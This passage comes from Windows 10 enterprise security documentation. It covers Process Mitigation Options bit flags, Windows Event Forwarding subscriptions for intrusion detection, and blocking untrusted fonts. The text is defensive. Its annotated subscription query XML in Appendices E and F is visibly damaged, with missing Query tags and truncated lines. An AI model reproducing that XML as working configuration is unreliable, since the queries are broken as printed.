malware might attempt to use buffer overruns to inject malicious executable code into memory, but Process Mitigation
Options can prevent the running of the malicious code.
IMPORTANT
We recommend trying these mitigations in a test lab before deploying to your organization, to determine if they interfere with
your organization’s required apps.
The Group Policy settings in this topic are related to three types of process mitigations. In Windows 10, all three types
are on by default for 64-bit applications, but by using the Group Policy settings described in this topic, you can
configure additional protections. The types of process mitigations are:
Data Execution Prevention (DEP ) is a system-level memory protection feature that enables the operating
system to mark one or more pages of memory as non-executable, preventing code from being run from that
region of memory, to help prevent exploitation of buffer overruns. DEP helps prevent code from being run from
data pages such as the default heap, stacks, and memory pools. For more information, see Data Execution
Prevention.
Structured Exception Handling Overwrite Protection (SEHOP ) is designed to block exploits that use the
Structured Exception Handler (SEH) overwrite technique. Because this protection mechanism is provided at run-
time, it helps to protect apps regardless of whether they have been compiled with the latest improvements. For
more information, see Structured Exception Handling Overwrite Protection.
Address Space Layout Randomization (ASLR) loads DLLs into random memory addresses at boot time to
mitigate against malware that’s designed to attack specific memory locations, where specific DLLs are expected
to be loaded. For more information, see Address Space Layout Randomization. To find additional ASLR
protections in the table below, look for IMAGES or ASLR .
The following procedure describes how to use Group Policy to override individual Process Mitigation Options
settings.
To modify Process Mitigation Options
1. Open your Group Policy editor and go to the Administrative Templates\System\Mitigation
Options\Process Mitigation Options setting.
2. Click Enabled, and then in the Options area, click Show to open the Show Contents box, where you’ll be able
to add your apps and the appropriate bit flag values, as shown in the Setting the bit field and Example sections of
this topic.
Important
For each app you want to include, you must include:
Value name. The app file name, including the extension. For example, iexplore.exe.
Value. A bit field with a series of bit flags in particular positions. Bits can be set to 0 (where the setting is
forced off), 1 (where the setting is forced on), or ? (where the setting retains the previous, existing value).
Note
Setting bit flags in positions not specified here to anything other than ? might cause undefined behavior.
Setting the bit field
Here’s a visual representation of the bit flag locations for the various Process Mitigation Options settings:
Where the bit flags are read from right to left and are defined as:
FLAG BIT LOCATION SETTING DETAILS
A 0 Turns on Data Execution

PROCESS_CREATION_MITIGATION_POLICY_DEP_ENABLE
(0x00000001) Prevention (DEP) for child
processes.
B 1 Turns on DEP-ATL thunk

PROCESS_CREATION_MITIGATION_POLICY_DEP_ATL_THUNK_ENABLE
(0x00000002) emulation for child processes.
DEP-ATL thunk emulation lets
the system intercept non-
executable (NX) faults that
originate from the Active
Template Library (ATL) thunk
layer, and then emulate and
handle the instructions so the
process can continue to run.
FLAG BIT LOCATION SETTING DETAILS
C 2 Turns on Structured Exception

PROCESS_CREATION_MITIGATION_POLICY_SEHOP_ENABLE
(0x00000004) Handler Overwrite Protection
(SEHOP) for child processes.
SEHOP helps to block exploits
that use the Structured
Exception Handler (SEH)
overwrite technique.
D 8 Uses the force Address Space

PROCESS_CREATION_MITIGATION_POLICY_FORCE_RELOCATE_IMAGES_ALWAYS_ON
(0x00000100) Layout Randomization (ASLR)
setting to act as though an
image base collision happened
at load time, forcibly rebasing
images that aren’t dynamic
base compatible. Images
without the base relocation
section won’t be loaded if
relocations are required.
E 15 Turns on the bottom-up

PROCESS_CREATION_MITIGATION_POLICY_BOTTOM_UP_ASLR_ALWAYS_ON
(0x00010000) randomization policy, which
includes stack randomization
options and causes a random
location to be used as the
lowest user address.
F 16 Turns off the bottom-up

PROCESS_CREATION_MITIGATION_POLICY_BOTTOM_UP_ASLR_ALWAYS_OFF
(0x00020000) randomization policy, which
includes stack randomization
options and causes a random
location to be used as the
lowest user address.
Example
If you want to turn on the PROCESS_CREATION_MITIGATION_POLICY_DEP_ENABLE and
PROCESS_CREATION_MITIGATION_POLICY_FORCE_RELOCATE_IMAGES_ALWAYS_ON settings, turn off the
PROCESS_CREATION_MITIGATION_POLICY_BOTTOM_UP_ASLR_ALWAYS_OFF setting, and leave everything
else as the default values, you’d want to type a value of ???????????????0???????1???????1 .
Use Windows Event Forwarding to help with intrusion
detection
Applies to
Windows 10
Windows Server
Learn about an approach to collect events from devices in your organization. This article talks about events in both
normal operations and when an intrusion is suspected.
Windows Event Forwarding (WEF ) reads any operational or administrative event log on a device in your
organization and forwards the events you choose to a Windows Event Collector (WEC ) server.
To accomplish this, there are two different of subscriptions published to client devices - the Baseline subscription
and the suspect subscription. The Baseline subscription enrolls all devices in your organization, and a Suspect
subscription only includes devices that have been added by you. The Suspect subscription collects additional events
to help build context for system activity and can quickly be updated to accommodate new events and/or scenarios
as needed without impacting baseline operations.
This implementation helps differentiate where events are ultimately stored. Baseline events can be sent to devices
with online analytical capability, such as Security Event Manager (SEM ), while also sending events to a MapReduce
system, such as HDInsight or Hadoop, for long-term storage and deeper analysis. Events from the Suspect
subscription are sent directly to a MapReduce system due to volume and lower signal/noise ratio, they are largely
used for host forensic analysis.
An SEM’s strength lies in being able to inspect, correlate events, and generate alerts for known patterns manner
and alert security staff at machine speed.
A MapReduce system has a longer retention time (years versus months for an SEM ), larger ingress ability
(hundreds of terabytes per day), and the ability to perform more complex operations on the data like statistical and
trend analysis, pattern clustering analysis, or apply Machine Learning algorithms.
Here's an approximate scaling guide for WEF events:
EVENTS/SECOND RANGE DATA STORE
0 - 5,000 SQL or SEM
5,000 - 50,000 SEM
50,000+ Hadoop/HDInsight/Data Lake
Event generation on a device must be enabled either separately or as part of the GPO for the baseline WEF
implementation, including enabling of disabled event logs and setting channel permissions. For more info, see
Appendix C - Event channel settings (enable and channel access) methods. This is because WEF is a passive system
with regards to the event log. It cannot change the size of event log files, enable disabled event channels, change
channel permissions, or adjust a security audit policy. WEF only queries event channels for existing events.
Additionally, having event generation already occurring on a device allows for more complete event collection
building a complete history of system activity. Otherwise, you'll be limited to the speed of GPO and WEF
subscription refresh cycles to make changes to what is being generated on the device. On modern devices,
enabling additional event channels and expanding the size of event log files has not resulted in noticeable
performance differences.
For the minimum recommended audit policy and registry system ACL settings, see Appendix A - Minimum
recommended minimum audit policy and Appendix B - Recommended minimum registry system ACL policy.
Note: These are only minimum values need to meet what the WEF subscription selects.
From a WEF subscription management perspective, the event queries provided should be used in two separate
subscriptions for ease of maintenance; only machines meeting specific criteria would be allowed access to the
targeted subscription, this access would be determined by an algorithm or an analysts’ direction. All devices should
have access to the Baseline subscription.
This means you would create two base subscriptions:
Baseline WEF subscription. Events collected from all hosts, this includes some role-specific events, which will
only be emitted by those machines.
Targeted WEF subscription. Events collected from a limited set of hosts due to unusual activity and/or
heightened awareness for those systems.
Each using the respective event query below. Note that for the Targeted subscription enabling the “read existing
events” option should be set to true to allow collection of existing events from systems. By default, WEF
subscriptions will only forward events generated after the WEF subscription was received by the client.
In Appendix E – Annotated Baseline Subscription Event Query and Appendix F – Annotated Suspect Subscription
Event Query, the event query XML is included when creating WEF subscriptions. These are annotated for query
purpose and clarity. Individual <Query> element can be removed or edited without affecting the rest of the query.
Common WEF questions
This section addresses common questions from IT pros and customers.
Will the user notice if their machine is enabled for WEF or if WEF encounters an error?
The short answer is: No.
The longer answer is: The Eventlog-forwardingPlugin/Operational event channel logs the success, warning,
and error events related to WEF subscriptions present on the device. Unless the user opens Event Viewer and
navigates to that channel, they will not notice WEF either through resource consumption or Graphical User
Interface pop-ups. Even if there is an issue with the WEF subscription, there is no user interaction or performance
degradation. All success, warning, and failure events are logged to this operational event channel.
Is WEF Push or Pull?
A WEF subscription can be configured to be push or pull, but not both. The simplest, most flexible IT deployment
with the greatest scalability can be achieved by using a push, or source initiated, subscription. WEF clients are
configured by using a GPO and the built-in forwarding client is activated. For pull, collector initiated, the
subscription on the WEC server is pre-configured with the names of the WEF Client devices from which events are
to be selected. Those clients also have to be configured ahead of time to allow the credentials used in the
subscription to access their event logs remotely (normally by adding the credential to the Event Log Readers
built-in local security group.) A useful scenario: closely monitoring a specific set of machines.
Will WEF work over VPN or RAS?
WEF handles VPN, RAS, and DirectAccess scenarios well and will reconnect and send any accumulated backlog of
events when the connection to the WEF Collector is re-established.
How is client progress tracked?
The WEC server maintains in its registry the bookmark information and last heartbeat time for each event source
for each WEF subscription. When an event source re-connects to a WEC server, the last bookmark position is sent
to the device to use as a starting point to resume forwarding events. If a WEF client has no events to send, the WEF
client will connect periodically to send a Heartbeat to the WEC server to indicate it is active. This heartbeat value
can be individually configured for each subscription.
Will WEF work in an IPv4, IPv6, or mixed IPv4/IPv6 environment?
Yes. WEF is transport agnostic and will work over IPv4 or IPv6.
Are WEF events encrypted? I see an HTTP/HTTPS option!
In a domain setting, the connection used to transmit WEF events is encrypted using Kerberos, by default (with
NTLM as a fallback option, which can be disabled by using a GPO ). Only the WEF collector can decrypt the
connection. Additionally, the connection between WEF client and WEC server is mutually authenticated regardless
of authentication type (Kerberos or NTLM.) There are GPO options to force Authentication to use Kerberos Only.
This authentication and encryption is performed regardless if HTTP or HTTPS is selected.
The HTTPS option is available if certificate based authentication is used, in cases where the Kerberos based mutual
authentication is not an option. The SSL certificate and provisioned client certificates are used to provide mutual
authentication.
Do WEF Clients have a separate buffer for events?
The WEF client machines local event log is the buffer for WEF for when the connection to the WEC server is lost.
To increase the “buffer size”, increase the maximum file size of the specific event log file where events are being
selected. For more info, see Appendix C – Event Channel Settings (enable and Channel Access) methods.
When the event log overwrites existing events (resulting in data loss if the device is not connected to the Event
Collector), there is no notification sent to the WEF collector that events are lost from the client. Neither is there an
indicator that there was a gap encountered in the event stream.
What format is used for forwarded events?
WEF has two modes for forwarded events. The default is “Rendered Text” which includes the textual description of
the event as you would see it in Event Viewer. This means that the event size is effectively doubled or tripled
depending on the size of the rendered description. The alternative mode is “Events” (also sometimes referred to as
“Binary” format) – which is just the event XML itself sent in binary XML format (as it would be written to the evtx
file.) This is very compact and can more than double the event volume a single WEC server can accommodate.
A subscription “testSubscription” can be configured to use the Events format through the WECUTIL utility:
@rem required to set the DeliveryMaxItems or DeliveryMaxLatencyTime

Wecutil ss “testSubscription” /cf:Events
How frequently are WEF events delivered?

Event delivery options are part of the WEF subscription configuration parameters – There are three built-in
subscription delivery options: Normal, Minimize Bandwidth, and Minimize Latency. A fourth, catch-all called
“Custom” is available but cannot be selected or configured through the WEF UI by using Event Viewer. The
Custom delivery option must be selected and configured using the WECUTIL.EXE command-line application. All
subscription options define a maximum event count and maximum event age, if either limit is exceeded then the
accumulated events are sent to the event collector.
This table outlines the built-in delivery options:
EVENT DELIVERY OPTIMIZATION OPTIONS DESCRIPTION

EVENT DELIVERY OPTIMIZATION OPTIONS DESCRIPTION
Normal This option ensures reliable delivery of events and does not
attempt to conserve bandwidth. It is the appropriate choice
unless you need tighter control over bandwidth usage or need
forwarded events delivered as quickly as possible. It uses pull
delivery mode, batches 5 items at a time and sets a batch
timeout of 15 minutes.
Minimize bandwidth This option ensures that the use of network bandwidth for
event delivery is strictly controlled. It is an appropriate choice
if you want to limit the frequency of network connections
made to deliver events. It uses push delivery mode and sets a
batch timeout of 6 hours. In addition, it uses a heartbeat
interval of 6 hours.
Minimize latency This option ensures that events are delivered with minimal
delay. It is an appropriate choice if you are collecting alerts or
critical events. It uses push delivery mode and sets a batch
timeout of 30 seconds.
For more info about delivery options, see Configure Advanced Subscription Settings.
The primary difference is in the latency which events are sent from the client. If none of the built-in options meet
your requirements you can set Custom event delivery options for a given subscription from an elevated command
prompt:
@rem required to set the DeliveryMaxItems or DeliveryMaxLatencyTime

Wecutil ss “SubscriptionNameGoesHere” /cm:Custom
@rem set DeliveryMaxItems to 1 event
Wecutil ss “SubscriptionNameGoesHere” /dmi:1
@rem set DeliveryMaxLatencyTime to 10 ms
Wecutil ss “SubscriptionNameGoesHere” /dmlt:10
How do I control which devices have access to a WEF Subscription?

For source initiated subscriptions: Each WEF subscription on a WEC server has its own ACL for machine accounts
or security groups containing machine accounts (not user accounts) that are explicitly allowed to participate in that
subscription or are explicitly denied access. This ACL applies to only a single WEF subscription (since there can be
multiple WEF subscriptions on a given WEC server), other WEF Subscriptions have their own separate ACL.
For collector initiated subscriptions: The subscription contains the list of machines from which the WEC server is to
collect events. This list is managed at the WEC server, and the credentials used for the subscription must have
access to read event logs from the WEF Clients – the credentials can be either the machine account or a domain
account.
Can a client communicate to multiple WEF Event Collectors?
Yes. If you desire a High-Availability environment, simply configure multiple WEC servers with the same
subscription configuration and publish both WEC Server URIs to WEF clients. WEF Clients will forward events
simultaneously to the configured subscriptions on the WEC servers, if they have the appropriate access.
What are the WEC server’s limitations?
There are three factors that limit the scalability of WEC servers. The general rule for a stable WEC server on
commodity hardware is “10k x 10k” – meaning, no more than 10,000 concurrently active WEF Clients per WEC
server and no more than 10,000 events/second average event volume.
Disk I/O. The WEC server does not process or validate the received event, but rather buffers the received event
and then logs it to a local event log file (EVTX file). The speed of logging to the EVTX file is limited by the disk
write speed. Isolating the EVTX file to its own array or using high speed disks can increase the number of events
per second that a single WEC server can receive.
Network Connections. While a WEF source does not maintain a permanent, persistent connection to the WEC
server, it does not immediately disconnect after sending its events. This means that the number of WEF sources
that can simultaneously connect to the WEC server is limited to the open TCP ports available on the WEC
server.
Registry size. For each unique device that connects to a WEF subscription, there is a registry key
(corresponding to the FQDN of the WEF Client) created to store bookmark and source heartbeat
information. If this is not pruned to remove inactive clients this set of registry keys can grow to an
unmanageable size over time.
When a subscription has >1000 WEF sources connect to it over its operational lifetime, also known as
lifetime WEF sources, Event Viewer can become unresponsive for a few minutes when selecting the
Subscriptions node in the left-navigation, but will function normally afterwards.
At >50,000 lifetime WEF sources, Event Viewer is no longer an option and wecutil.exe (included with
Windows) must be used to configure and manage subscriptions.
At >100,000 lifetime WEF sources, the registry will not be readable and the WEC server will likely have
to be rebuilt.
Subscription information
Below lists all of the items that each subscription collects, the actual subscription XML is available in an Appendix.
These are separated out into Baseline and Targeted. The intent is to subscribe all hosts to Baseline, and then enroll
(and remove) hosts on an as needed basis to the Targeted subscription.
Baseline subscription
While this appears to be the largest subscription, it really is the lowest volume on a per-device basis. (Exceptions
should be allowed for unusual devices – a device performing complex developer related tasks can be expected to
create an unusually high volume of process create and AppLocker events.) This subscription does not require
special configuration on client devices to enable event channels or modify channel permissions.
The subscription is essentially a collection of query statements applied to the Event Log. This means that it is
modular in nature and a given query statement can be removed or changed without impacting other query
statement in the subscription. Additionally, suppress statements which filter out specific events, only apply within
that query statement and are not to the entire subscription.
Baseline subscription requirements
To gain the most value out of the baseline subscription we recommend to have the following requirements set on
the device to ensure that the clients are already generating the required events to be forwarded off the system.
Apply a security audit policy that is a super-set of the recommended minimum audit policy. For more info, see
Appendix A – Minimum Recommended minimum Audit Policy. This ensures that the security event log is
generating the required events.
Apply at least an Audit-Only AppLocker policy to devices.
If you are already whitelisting or blacklisting events by using AppLocker, then this requirement is met.
AppLocker events contain extremely useful information, such as file hash and digital signature
information for executables and scripts.
Enable disabled event channels and set the minimum size for modern event files.
Currently, there is no GPO template for enabling or setting the maximum size for the modern event files. This
must be done by using a GPO. For more info, see Appendix C – Event Channel Settings (enable and Channel
Access) methods.
The annotated event query can be found in the following. For more info, see Appendix F – Annotated Suspect
Subscription Event Query.
Anti-malware events from Microsoft Antimalware or Windows Defender. This can be configured for any given
anti-malware product easily if it writes to the Windows event log.
Security event log Process Create events.
AppLocker Process Create events (EXE, script, packaged App installation and execution).
Registry modification events. For more info, see Appendix B – Recommended minimum Registry System ACL
Policy.
OS startup and shutdown
Startup event include operating system version, service pack level, QFE version, and boot mode.
Service install
Includes what the name of the service, the image path, and who installed the service.
Certificate Authority audit events
This is only applicable on systems with the Certificate Authority role installed.
Logs certificate requests and responses.
User profile events
Use of a temporary profile or unable to create a user profile may indicate an intruder is interactively
logging into a device but not wanting to leave a persistent profile behind.
Service start failure
Failure codes are localized, so you have to check the message DLL for values.
Network share access events
Filter out IPC$ and /NetLogon file shares, which are expected and noisy.
System shutdown initiate requests
Find out what initiated the restart of a device.
User initiated interactive logoff event
Remote Desktop Services session connect, reconnect, or disconnect.
EMET events, if EMET is installed.
Event forwarding plugin events
For monitoring WEF subscription operations, particularly Partial Success events. This is useful for
diagnosing deployment issues.
Network share create and delete
Enables detection of unauthorized share creation. >Note: All shares are re-created when the device
starts.
Logon sessions
Logon success for interactive (local and Remote Interactive/Remote Desktop)
Logon success for services for non-built-in accounts, such as LocalSystem, LocalNetwork, and so on.
Logon success for batch sessions
Logon session close, which are logoff events for non-network sessions.
Windows Error Reporting (Application crash events only)
This can help detect early signs of intruder not familiar with enterprise environment using targeted
malware.
Event log service events
Errors, start events, and stop events for the Windows Event Log service.
Event log cleared (including the Security Event Log)
This could indicate an intruder that are covering their tracks.
Special privileges assigned to new logon
This indicates that at the time of logon a user is either an Administrator or has the sufficient access to
make themselves Administrator.
Outbound Remote Desktop Services session attempts
Visibility into potential beachhead for intruder
System time changed
SMB Client (mapped drive connections)
Account credential validation
Local accounts or domain accounts on domain controllers
A user was added or removed from the local Administrators security group.
Crypto API private key accessed
Associated with signing objects using the locally stored private key.
Task Scheduler task creation and delete
Task Scheduler allows intruders to run code at specified times as LocalSystem.
Logon with explicit credentials
Detect credential use changes by intruders to access additional resources.
Smartcard card holder verification events
This detects when a smartcard is being used.
Suspect subscription
This adds some possible intruder-related activity to help analyst further refine their determinations about the state
of the device.
Logon session creation for network sessions
Enables time-series analysis of network graphs.
RADIUS and VPN events
Useful if you use a Microsoft IAS RADIUS/VPN implementation. It shows user-> IP address assignment
with remote IP address connecting to the enterprise.
Crypto API X509 object and build chain events
Detects known bad certificate, CA, or sub-CA
Detects unusual process use of CAPI
Groups assigned to local logon
Gives visibility to groups which enable account wide access
Allows better planning for remediation efforts
Excludes well known, built-in system accounts.
Logon session exit
Specific for network logon sessions.
Client DNS lookup events
Returns what process performed a DNS query and the results returned from the DNS server.
Process exit
Enables checking for processes terminating unexpectedly.
Local credential validation or logon with explicit credentials
Generated when the local SAM is authoritative for the account credentials being authenticated.
Noisy on domain controllers
On client devices this is only generated when local accounts log on.
Registry modification audit events
Only when a registry value is being created, modified, or deleted.
Wireless 802.1x authentication
Detect wireless connection with a peer MAC address
Windows PowerShell logging
Covers Windows PowerShell 2.0 and later and includes the Windows PowerShell 5.0 logging
improvements for in-memory attacks using Windows PowerShell.
Includes Windows PowerShell remoting logging
User Mode Driver Framework “Driver Loaded” event
Can possibly detect a USB device loading multiple device drivers. For example, a USB_STOR device
loading the keyboard or network driver.
Appendix A - Minimum recommended minimum audit policy

If your organizational audit policy enables additional auditing to meet its needs, that is fine. The policy below is the
minimum audit policy settings needed to enable events collected by both baseline and targeted subscriptions.
CATEGORY SUBCATEGORY AUDIT SETTINGS
Account Logon Credential Validation Success and Failure
Account Management Security Group Management Success
Account Management User Account Management Success and Failure
Account Management Computer Account Management Success and Failure
Account Management Other Account Management Events Success and Failure
Detailed Tracking Process Creation Success
Detailed Tracking Process Termination Success
Logon/Logoff User/Device Claims Not configured
Logon/Logoff IPsec Extended Mode Not configured
Logon/Logoff IPsec Quick Mode Not configured
Logon/Logoff Logon Success and Failure

CATEGORY SUBCATEGORY AUDIT SETTINGS
Logon/Logoff Logoff Success
Logon/Logoff Other Logon/Logoff Events Success and Failure
Logon/Logoff Special Logon Success and Failure
Logon/Logoff Account Lockout Success
Object Access Application Generated Not configured
Object Access File Share Success
Object Access File System Not configured
Object Access Other Object Access Events Not configured
Object Access Registry Not configured
Object Access Removable Storage Success
Policy Change Audit Policy Change Success and Failure
Policy Change MPSSVC Rule-Level Policy Change Success and Failure
Policy Change Other Policy Change Events Success and Failure
Policy Change Authentication Policy Change Success and Failure
Policy Change Authorization Policy Change Success and Failure
Privilege Use Sensitive Privilege Use Not configured
System Security State Change Success and Failure
System Security System Extension Success and Failure
System System Integrity Success and Failure
Appendix B - Recommended minimum registry system ACL policy

The Run and RunOnce keys are useful for intruders and malware persistence. It allows code to be run (or run only
once then removed, respectively) when a user logs into the system.
This can easily be extended to other Auto-Execution Start Points keys in the registry.
Use the following figures to see how you can configure those registry keys.
Appendix C - Event channel settings (enable and channel access)
methods
Some channels are disabled by default and have to be enabled. Others, such as Microsoft-Windows-
CAPI2/Operational must have the channel access modified to allow the Event Log Readers built-in security group
to read from it.
The recommended and most effective way to do this is to configure the baseline GPO to run a scheduled task to
configure the event channels (enable, set maximum size, and adjust channel access.) This will take effect at the next
GPO refresh cycle and has minimal impact on the client device.
The following GPO snippet performs the following:
Enables the Microsoft-Windows-Capi2/Operational event channel.
Sets the maximum file size for Microsoft-Windows-Capi2/Operational to 100MB.
Sets the maximum file size for Microsoft-Windows-AppLocker/EXE and DLL to 100MB.
Sets the maximum channel access for Microsoft-Windows-Capi2/Operational to include the built-in Event
Log Readers security group.
Enables the Microsoft-Windows-DriverFrameworks-UserMode/Operational event channel.
Sets the maximum file size for Microsoft-Windows-DriverFrameworks-UserMode/Operational to 50MB.
Appendix D - Minimum GPO for WEF Client configuration
Here are the minimum steps for WEF to operate:
1. Configure the collector URI(s).
2. Start the WinRM service.
3. Add the Network Service account to the built-in Event Log Readers security group. This allows reading from
secured event channel, such as the security event channel.
Appendix E – Annotated baseline subscription event query
<QueryList>
<Query Id="0" Path="System">

<Select Path="System">*[System[Provider[@Name='Microsoft Antimalware'] and (EventID >= 1116 and EventID
<= 1119)]]</Select>
</Query>

<Query Id="1" Path="Microsoft-Windows-AppLocker/EXE and DLL">
<Select Path="Microsoft-Windows-AppLocker/EXE and DLL">*[UserData[RuleAndFileData[PolicyName="EXE"]]]
</Select>
<Select Path="Microsoft-Windows-AppLocker/MSI and Script">*</Select>
</Query>
<Query Id="2" Path="Security">

<Select Path="Security">*[System[(EventID=5632)]]</Select>
</Query>
<Query Id="3" Path="Microsoft-Windows-TaskScheduler/Operational">

<Select Path="Microsoft-Windows-TaskScheduler/Operational">*[System[Provider[@Name='Microsoft-Windows-
TaskScheduler'] and (EventID=106 or EventID=141 or EventID=142 )]]</Select>
<Select Path="System">*[System[Provider[@Name='Microsoft-Windows-TaskScheduler'] and (EventID=106 or
EventID=141 or EventID=142 )]]</Select>
</Query>

<Select Path="System">*[System[Provider[@Name='Microsoft-Windows-Kernel-General'] and (EventID=12 or
EventID=13)]]</Select>
</Query>

<Select Path="System">*[System[Provider[@Name='Service Control Manager'] and (EventID = 7000 or
</Query>

<Select Path="Security">*[System[(EventID=4778 or EventID=4779)]]</Select>
</Query>

<Select Path="Security">*[System[(EventID=5140)]] and (*[EventData[Data[@Name="ShareName"]!="\\*\IPC$"]])
and (*[EventData[Data[@Name="ShareName"]!="\\*\NetLogon"]])</Select>
</Query>

</Query>

<Select Path="System">*[System[Provider[@Name='USER32'] and (EventID=1074)]]</Select>
</Query>

<Query Id="10" Path="Microsoft-Windows-AppLocker/Packaged app-Execution">
<Select Path="Microsoft-Windows-AppLocker/Packaged app-Execution">*</Select>
</Query>

<Query Id="11" Path="Microsoft-Windows-AppLocker/Packaged app-Deployment">
<Select Path="Microsoft-Windows-AppLocker/Packaged app-Deployment">*</Select>
</Query>
<Query Id="12" Path="Application">

<Select Path="Application">*[System[Provider[@Name='EMET']]]</Select>
</Query>

<Select Path="System">*[System[Provider[@Name='Microsoft-Windows-Eventlog']]]</Select>
</Query>

<Select Path="Security">*[System[(EventID=4624)]] and (*[EventData[Data[@Name="LogonType"]!="3"]]) and (*
[EventData[Data[@Name="LogonType"]!="5"]])</Select>
</Query>

<Select Path="Application">*[System[Provider[@Name='Windows Error Reporting']]] and (*[EventData[Data[3]
="APPCRASH"]])</Select>
</Query>

<Select Path="Security">*[System[(EventID=1102 or EventID = 1100)]]</Select>
</Query>

<Select Path="System">*[System[(EventID=104)]]</Select>
</Query>

</Query>

<Select Path="Security">*[System[(EventID=4634)]] and (*[EventData[Data[@Name="LogonType"] != "3"]])
</Select>
</Query>

<Select Path="Security">*[System[(EventID=4624)]] and (*[EventData[Data[@Name="LogonType"]="5"]]) and (*
[EventData[Data[@Name="TargetUserSid"] != "S-1-5-18"]]) and (*[EventData[Data[@Name="TargetUserSid"] != "S-1-5-
19"]]) and (*[EventData[Data[@Name="TargetUserSid"] != "S-1-5-20"]])</Select>
</Query>

</Query>

<Select Path="Security">*[System[EventID=4688]]</Select>
</Query>

<Select Path="Security">*[System[Provider[@Name='Microsoft-Windows-Eventlog']]]</Select>
</Query>

<Suppress Path="Security">*[EventData[Data[1]="S-1-5-18"]]</Suppress>
</Query>

</Query>

</Query>

</Query>

<Select Path="Security">*[System[(EventID=4733)]] and (*
[EventData[Data[@Name="TargetUserName"]="Administrators"]])</Select>
</Query>
<Query Id="31" Path="Microsoft-Windows-TerminalServices-RDPClient/Operational">

<Select Path="Microsoft-Windows-TerminalServices-RDPClient/Operational">*[System[(EventID=1024)]]</Select>
</Query>

<Select Path="Security">*[System[(EventID=4886 or EventID=4887 or EventID=4888)]]</Select>
</Query>

<Select Path="Security">*[System[(EventID=4720 or EventID=4722 or EventID=4725 or EventID=4726)]]</Select>
</Query>
<Query Id="35" Path="Microsoft-Windows-SmartCard-Audit/Authentication">

<Select Path="Microsoft-Windows-SmartCard-Audit/Authentication">*</Select>
</Query>
<Query Id="36" Path="Microsoft-Windows-SMBClient/Operational">

<Select Path="Microsoft-Windows-SMBClient/Operational">*[System[(EventID=30622 or EventID=30624)]]</Select>
</Query>

<Select Path="Microsoft-Windows-Sysmon/Operational">*</Select>
</Query>
</Query>

<Select Path="Application">*[System[Provider[@Name='Application Error'] and (EventID=1000)]]</Select>
<Select Path="Application">*[System[Provider[@Name='Application Hang'] and (EventID=1002)]]</Select>
</Query>
<Query Id="41" Path="Microsoft-Windows-Windows Defender/Operational">

<Select Path="Microsoft-Windows-Windows Defender/Operational">*[System[( (EventID >= 1006 and EventID
<= 1009) )]]</Select>
<Select Path="Microsoft-Windows-Windows Defender/Operational">*[System[( (EventID >= 1116 and EventID
<= 1119) )]]</Select>
</Query>
</QueryList>
Appendix F – Annotated Suspect Subscription Event Query

<QueryList>

<Select Path="Security">*[System[(EventID=4624)]] and (*[EventData[Data[@Name="LogonType"]="3"]])</Select>
</Query>

<Select Path="System">*[System[Provider[@Name='RemoteAccess'] and (EventID=20274 or EventID=20250 or
</Query>
<Query Id="2" Path="Microsoft-Windows-CAPI2/Operational">

<Select Path="Microsoft-Windows-CAPI2/Operational">*[System[(EventID=11 or EventID=70 or EventID=90)]]
</Select>
</Query>

<Select Path="Security">*[System[(EventID=4880 or EventID = 4881 or EventID = 4896 or EventID = 4898)]]
</Select>
</Query>
<Query Id="4" Path="Microsoft-Windows-LSA/Operational">

<Select Path="Microsoft-Windows-LSA/Operational">*[System[(EventID=300)]] and (*
18"]]) and (*[EventData[Data[@Name="TargetUserSid"] != "S-1-5-19"]])</Select>
</Query>

<Select Path="Security">*[System[(EventID=4634)]] and (*[EventData[Data[@Name="LogonType"] = "3"]])
</Select>
</Query>

<Select Path="Security">*[System[( (EventID >= 6272 and EventID <= 6280) )]]</Select>
</Query>
<Query Id="7" Path="Microsoft-Windows-DNS-Client/Operational">

<Select Path="Microsoft-Windows-DNS-Client/Operational">*[System[(EventID=3008)]]</Select>

<Suppress Path="Microsoft-Windows-DNS-Client/Operational">*
[EventData[Data[@Name="QueryOptions"]="140737488355328"]]</Suppress>

<Suppress Path="Microsoft-Windows-DNS-Client/Operational">*[EventData[Data[@Name="QueryResults"]=""]]
</Suppress>
</Query>


<Select Path="Security">*[System[(EventID = 4689)]]</Select>
</Query>

</Query>

<Select Path="Security">*[System[(EventID=4657)]] and ((*[EventData[Data[@Name="OperationType"] =
"%%1904"]]) or (*[EventData[Data[@Name="OperationType"] = "%%1905"]]) or (*
[EventData[Data[@Name="OperationType"] = "%%1906"]]))</Select>
</Query>

</Query>
<Query Id="12" Path="Microsoft-Windows-PowerShell/Operational">

<Select Path="Microsoft-Windows-PowerShell/Operational">*[System[(EventID=4103 or EventID=4104 or
EventID=4105 or EventID=4106)]]</Select>
</Query>
<Query Id="13" Path="Microsoft-Windows-DriverFrameworks-UserMode/Operational">

<Select Path="Microsoft-Windows-DriverFrameworks-UserMode/Operational">*[System[(EventID=2004)]]</Select>
</Query>
<Query Id="14" Path="Windows PowerShell">

<Select Path="Windows PowerShell">*[System[(EventID=800)]]</Select>
</Query>
</QueryList>
Appendix G - Online resources

You can get more info with the following links:
Event Selection
Event Queries and Event XML
Event Query Schema
Windows Event Collector
Block untrusted fonts in an enterprise
Applies to:
Windows 10
Learn more about what features and functionality are supported in each Windows edition at Compare
Windows 10 Editions.
To help protect your company from attacks which may originate from untrusted or attacker controlled font files,
we’ve created the Blocking Untrusted Fonts feature. Using this feature, you can turn on a global setting that stops
your employees from loading untrusted fonts processed using the Graphics Device Interface (GDI) onto your
network. Untrusted fonts are any font installed outside of the %windir%/Fonts directory. Blocking untrusted fonts
helps prevent both remote (web-based or email-based) and local EOP attacks that can happen during the font file-
parsing process.
What does this mean for me?

Blocking untrusted fonts helps improve your network and employee protection against font-processing-related
attacks. By default, this feature is not turned on.
How does this feature work?

There are 3 ways to use this feature:
On. Helps stop any font processed using GDI from loading outside of the %windir%/Fonts directory. It also
turns on event logging.
Audit. Turns on event logging, but doesn’t block fonts from loading, regardless of location. The name of the
apps that use untrusted fonts appear in your event log.
Note
If you aren’t quite ready to deploy this feature into your organization, you can run it in Audit mode to see if
not loading untrusted fonts causes any usability or compatibility issues.
Exclude apps to load untrusted fonts. You can exclude specific apps, allowing them to load untrusted
fonts, even while this feature is turned on. For instructions, see Fix apps having problems because of blocked
fonts.
Potential reductions in functionality

After you turn this feature on, your employees might experience reduced functionality when:
Sending a print job to a remote printer server that uses this feature and where the spooler process hasn’t
been specifically excluded. In this situation, any fonts that aren’t already available in the server’s
%windir%/Fonts folder won’t be used.
Printing using fonts provided by the installed printer’s graphics .dll file, outside of the %windir%/Fonts
folder. For more information, see Introduction to Printer Graphics DLLs.
Using first or third-party apps that use memory-based fonts.
Using Internet Explorer to look at websites that use embedded fonts. In this situation, the feature blocks the
embedded font, causing the website to use a default font. However, not all fonts have all of the characters, so
